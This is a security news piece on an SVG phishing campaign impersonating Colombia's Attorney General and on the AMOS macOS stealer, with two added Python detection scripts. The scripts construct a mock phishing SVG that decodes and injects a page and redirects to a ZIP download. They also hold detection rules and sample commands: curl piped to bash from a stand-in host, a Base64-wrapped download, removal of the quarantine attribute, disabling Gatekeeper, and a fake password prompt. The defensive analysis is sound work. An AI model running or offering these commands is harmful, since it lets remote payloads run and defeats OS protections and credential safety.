VirusTotal flags 44 undetected SVGs in Colombian phishing campaign; hundreds of SVGs detected in the wild

Cybersecurity researchers have flagged a malware campaign that weaponizes Scalable Vector Graphics (SVG) files to deliver phishing attacks impersonating Colombia’s Fiscalía General de la Nación, the Office of the Attorney General. The details were highlighted by VirusTotal.

Key finding: VirusTotal said it identified 44 unique SVG files that remained undetected by antivirus engines due to obfuscation, polymorphism and the inclusion of large amounts of junk code designed to defeat static detection methods.

The campaign distributes the SVGs via email. SVG is an XML format that can carry a `<script>` element, and a browser executes that script when the file is opened directly (for instance, from an attachment) rather than rendered through an `<img>` tag. Each sample's embedded JavaScript payload decodes a Base64-encoded HTML phishing page and injects it into the document, producing a portal that masquerades as Fiscalía General de la Nación.

The faux portal then imitates a legitimate document download process with a fake progress bar, while covertly triggering the download of a ZIP archive in the background. The exact contents of the ZIP file were not disclosed by researchers.
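The SVG structure described above (script element, Base64 blob, decode-and-inject, background archive download) is easy to triage statically once the file is treated as XML rather than as an image. The following Python scanner is an added example and is not code from the article or from VirusTotal; the sample SVG it analyses is constructed to mirror the described structure, and the indicator names, regular expressions and verdict threshold are assumptions chosen for illustration. It extracts every `<script>` body and event-handler attribute, decodes Base64 literals found in the script, and looks for HTML and archive references in the decoded payload.

```python
"""Static triage for SVG files carrying embedded script (added example, not the article's code)."""
import base64
import re
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"

# Constructed sample (not a real campaign file): a decoy HTML page with a fake
# progress bar that redirects to a ZIP, wrapped in Base64 and injected by script.
_FAKE_PORTAL_HTML = (
    "<html><body><h1>Fiscalia General de la Nacion</h1>"
    "<progress id='bar' max='100'></progress>"
    "<script>setTimeout(function(){location.href='documento.zip'},3000)</script>"
    "</body></html>"
)
SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <rect width="1" height="1"/>
  <script><![CDATA[
    var _0x1 = "{base64.b64encode(_FAKE_PORTAL_HTML.encode()).decode()}";
    document.documentElement.innerHTML = atob(_0x1);
  ]]></script>
</svg>"""

# Indicators evaluated against raw script text (names are illustrative assumptions).
SCRIPT_INDICATORS = {
    "atob_decode": re.compile(r"\batob\s*\("),
    "dom_injection": re.compile(r"\.innerHTML\s*=|document\.write\s*\(|insertAdjacentHTML"),
    "archive_download": re.compile(r"\.zip\b", re.I),
}
# Long runs of Base64 alphabet; short matches are too noisy to bother decoding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_scripts(svg_bytes: bytes) -> list:
    """Return the text of every <script> element, namespaced or not."""
    root = ET.fromstring(svg_bytes)
    return [(el.text or "") for el in root.iter()
            if el.tag in ("script", SVG_NS + "script")]


def has_event_handlers(svg_bytes: bytes) -> bool:
    """onload=, onclick= and friends run script without a <script> element."""
    root = ET.fromstring(svg_bytes)
    return any(k.lower().startswith("on") for el in root.iter() for k in el.attrib)


def decode_base64_blobs(text: str) -> list:
    """Strictly decode every long Base64-looking literal; skip anything invalid."""
    blobs = []
    for m in B64_RE.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return blobs


def triage(svg_bytes: bytes) -> dict:
    """Score one SVG: collects indicator hits from script text and decoded payloads."""
    scripts = extract_scripts(svg_bytes)
    hits = set()
    decoded_html = []
    for js in scripts:
        for name, rx in SCRIPT_INDICATORS.items():
            if rx.search(js):
                hits.add(name)
        for blob in decode_base64_blobs(js):
            text = blob.decode("utf-8", errors="ignore")
            if re.search(r"<html|<form|<input", text, re.I):
                hits.add("base64_html_payload")
                decoded_html.append(text)
            if re.search(r"\.zip\b", text, re.I):
                hits.add("archive_download")
    if has_event_handlers(svg_bytes):
        hits.add("event_handler")
    # Threshold is an assumption: any script plus two corroborating indicators.
    verdict = "suspicious" if (scripts or "event_handler" in hits) and len(hits) >= 2 else "benign"
    return {
        "script_count": len(scripts),
        "indicators": sorted(hits),
        "decoded_html": decoded_html,
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_SVG.encode())
    print(result["verdict"], result["indicators"])
    for page in result["decoded_html"]:
        print("decoded payload:", page[:80])
```

Because the real samples pad the script with junk code and vary it per file, matching on the decoded payload (HTML tags, archive names) holds up better than hashing or matching the obfuscated script text itself; the junk only affects the outer layer.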

In total, as many as 523 SVG files have been detected in the wild, with the earliest sample dating back to August 14, 2025. VirusTotal also noted that the earliest samples were larger – around 25 MB – and the size has decreased over time as attackers refined their payloads.

Separately, researchers highlighted a broader trend of threat actors relying on cracked software and ClickFix-style techniques to deliver malware on macOS. The activity has been linked to the macOS stealer AMOS, which Trend Micro describes as capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items and other files from common folders.

Trend Micro notes that AMOS illustrates that macOS is no longer a peripheral target and has become a lucrative focus for attackers as enterprises increasingly adopt Apple devices.

Trend Micro also observed that, despite macOS Sequoia tightening Gatekeeper to block unsigned DMG installations, attackers continue to pivot to terminal-based delivery: a ClickFix-style lure walks the victim through pasting a command into Terminal that fetches and runs the payload, sidestepping the checks Gatekeeper applies to files downloaded by a browser or mail client. The report emphasizes that defense-in-depth measures remain essential and should not rely solely on built-in OS protections, given attackers' willingness to adapt.
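The terminal-based delivery described above leaves a trace that is easy to hunt for: the pasted command itself, as it appears in shell history or in process-creation telemetry. The Python script below is an added example and is not code from the article or from Trend Micro's report. It applies a small set of heuristics for ClickFix-style macOS delivery (download piped to a shell, Base64-wrapped commands, stripping the quarantine attribute, disabling Gatekeeper, a scripted password prompt) to constructed command lines; the rule names, patterns, `example.invalid` URLs and sample commands are all assumptions made for illustration. It also decodes Base64 literals so that a command hidden inside `base64 -d | sh` is classified on its decoded content rather than on its wrapper.

```python
"""Heuristic triage of shell commands for ClickFix-style macOS delivery (added example)."""
import base64
import re

# Gatekeeper evaluates files that carry the com.apple.quarantine extended
# attribute, which browsers and mail clients set on downloads; curl and wget
# do not set it, so curl | bash runs the payload without that check.
RULES = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64_decode_exec": re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b"),
    "quarantine_strip": re.compile(r"\bxattr\b.*(?:-r?d\s+com\.apple\.quarantine|\s-r?c\b)"),
    "gatekeeper_disable": re.compile(r"\bspctl\b.*--(master|global)-disable"),
    "password_prompt": re.compile(r"\bosascript\b.*(hidden answer|password)", re.I),
}
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample lines (not real telemetry); the Base64 one wraps a curl | bash.
_INNER = base64.b64encode(b"curl -s https://example.invalid/p | bash").decode()
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    f'echo "{_INNER}" | base64 -d | sh',
    "xattr -d com.apple.quarantine /Applications/Cracked.app",
    "brew install wget",
    "osascript -e 'display dialog \"Enter your password\" default answer \"\" with hidden answer'",
]


def decode_embedded_base64(cmd: str) -> list:
    """Strictly decode Base64-looking literals in a command; ignore non-Base64 tokens."""
    decoded = []
    for m in B64_LITERAL.finditer(cmd):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore"))
        except ValueError:
            continue
    return decoded


def classify(cmd: str, depth: int = 0) -> set:
    """Return the set of rule names a command triggers, recursing into decoded Base64."""
    hits = {name for name, rx in RULES.items() if rx.search(cmd)}
    if "base64_decode_exec" in hits and depth < 2:  # bounded so nested wrappers cannot loop
        for inner in decode_embedded_base64(cmd):
            hits |= classify(inner, depth + 1)
    return hits


def scan(commands: list) -> list:
    """Return only the flagged commands, each with its sorted rule list."""
    flagged = []
    for cmd in commands:
        rules = classify(cmd)
        if rules:
            flagged.append({"command": cmd, "rules": sorted(rules)})
    return flagged


if __name__ == "__main__":
    for entry in scan(SAMPLE_COMMANDS):
        print(", ".join(entry["rules"]), "<-", entry["command"])
```

These patterns are deliberately narrow; `curl | bash` is also how plenty of legitimate installers are documented, so in practice the hit is a pivot for context (parent process, user, what the fetched script contained) rather than a verdict on its own.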